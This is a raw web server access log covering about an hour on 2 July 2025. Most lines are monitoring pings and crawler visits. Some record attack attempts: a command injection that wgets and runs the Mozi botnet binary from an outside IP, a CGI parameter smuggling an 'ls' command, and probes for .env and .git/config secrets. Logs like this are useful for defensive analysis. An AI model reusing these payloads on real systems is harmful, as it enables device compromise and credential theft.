212.91.247.32 - - [02/Jul/2025:09:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.230.66.126 - - [02/Jul/2025:09:22:16 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.126:11809/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.247.32 - - [02/Jul/2025:09:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.159.89 - - [02/Jul/2025:09:23:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.159.89 - - [02/Jul/2025:09:23:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.159.89 - - [02/Jul/2025:09:23:01 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
192.241.159.89 - - [02/Jul/2025:09:23:01 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
192.241.159.89 - - [02/Jul/2025:09:23:01 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
192.241.159.89 - - [02/Jul/2025:09:23:02 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.241.159.89 - - [02/Jul/2025:09:23:02 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.241.159.89 - - [02/Jul/2025:09:23:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.159.89 - - [02/Jul/2025:09:23:02 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.241.159.89 - - [02/Jul/2025:09:23:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.241.159.89 - - [02/Jul/2025:09:23:03 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:09:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:09:25:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
40.77.167.44 - - [02/Jul/2025:09:25:38 +0200] "GET /web68/web/seiten/start.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
134.209.251.42 - - [02/Jul/2025:09:25:45 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
134.209.251.42 - - [02/Jul/2025:09:25:45 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [02/Jul/2025:09:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:09:26:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:09:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:09:27:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:09:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.100.254.213 - - [02/Jul/2025:09:28:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
212.91.247.32 - - [02/Jul/2025:09:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:09:29:57 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:09:29:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
77.90.153.48 - - [02/Jul/2025:09:30:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0"
77.90.153.48 - - [02/Jul/2025:09:30:02 +0200] "GET /session/login HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
77.90.153.48 - - [02/Jul/2025:09:30:26 +0200] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
205.210.31.150 - - [02/Jul/2025:09:30:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.150 - - [02/Jul/2025:09:30:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
77.90.153.48 - - [02/Jul/2025:09:30:33 +0200] "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/bwjS.html; HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:09:30:34 +0200] "GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
77.90.153.48 - - [02/Jul/2025:09:30:36 +0200] "GET /wp-admin/profile.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:09:30:37 +0200] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
77.90.153.48 - - [02/Jul/2025:09:30:44 +0200] "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/bwjS.html; HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
212.91.247.32 - - [02/Jul/2025:09:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:09:30:56 +0200] "GET /bwjS.html HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0"
195.3.221.137 - - [02/Jul/2025:09:30:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
142.93.7.213 - - [02/Jul/2025:09:31:11 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
209.38.167.139 - - [02/Jul/2025:09:31:45 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
209.38.167.139 - - [02/Jul/2025:09:31:45 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
204.76.203.219 - - [02/Jul/2025:09:31:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:09:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:09:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:09:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [02/Jul/2025:09:36:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:09:36:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.128.49 - - [02/Jul/2025:09:37:37 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
204.76.203.219 - - [02/Jul/2025:09:37:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:09:37:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:38:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.135.142.37 - - [02/Jul/2025:09:39:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.167.157.80 - - [02/Jul/2025:09:39:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:09:39:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:40:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:42:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:43:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.151.51 - - [02/Jul/2025:09:44:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
43.134.49.205 - - [02/Jul/2025:09:44:23 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
212.91.247.32 - - [02/Jul/2025:09:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [02/Jul/2025:09:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:09:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.130.8 - - [02/Jul/2025:09:47:45 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:09:47:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.172 - - [02/Jul/2025:09:48:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.247.32 - - [02/Jul/2025:09:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [02/Jul/2025:09:49:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.129.130 - - [02/Jul/2025:09:49:13 +0200] "GET /metrics HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
143.198.106.199 - - [02/Jul/2025:09:49:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "portalmmm/2.0 N410i(c20;TB)"
204.76.203.219 - - [02/Jul/2025:09:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:09:49:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:09:50:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
204.76.203.219 - - [02/Jul/2025:09:50:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:09:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:51:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.235 - - [02/Jul/2025:09:52:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
147.185.132.27 - - [02/Jul/2025:09:52:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.27 - - [02/Jul/2025:09:52:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [02/Jul/2025:09:52:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [02/Jul/2025:09:54:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [02/Jul/2025:09:54:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1; Lenovo P70-A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.247.32 - - [02/Jul/2025:09:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [02/Jul/2025:09:55:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
195.3.221.137 - - [02/Jul/2025:09:55:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
176.65.149.178 - - [02/Jul/2025:09:55:45 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.247.32 - - [02/Jul/2025:09:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Jul/2025:09:56:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1; Lenovo P70-A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.247.32 - - [02/Jul/2025:09:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Jul/2025:09:57:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1; Lenovo P70-A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
93.174.93.12 - - [02/Jul/2025:09:57:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1; Lenovo P70-A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.247.32 - - [02/Jul/2025:09:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Jul/2025:09:58:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1; Lenovo P70-A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.247.32 - - [02/Jul/2025:09:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:09:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.64.128 - - [02/Jul/2025:10:00:25 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.247.32 - - [02/Jul/2025:10:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [02/Jul/2025:10:01:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:10:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:10:06:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
142.93.7.213 - - [02/Jul/2025:10:06:54 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [02/Jul/2025:10:06:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:09:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.7.213 - - [02/Jul/2025:10:10:53 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [02/Jul/2025:10:10:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.62 - - [02/Jul/2025:10:14:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.156.129.52 - - [02/Jul/2025:10:14:03 +0200] "GET /metrics HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:10:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [02/Jul/2025:10:15:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:10:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [02/Jul/2025:10:18:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.84 - - [02/Jul/2025:10:18:04 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:10:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.149 - - [02/Jul/2025:10:19:54 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
212.91.247.32 - - [02/Jul/2025:10:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.159.135.203 - - [02/Jul/2025:10:20:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.219 - - [02/Jul/2025:10:21:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:10:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.49.172.209 - - [02/Jul/2025:10:29:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
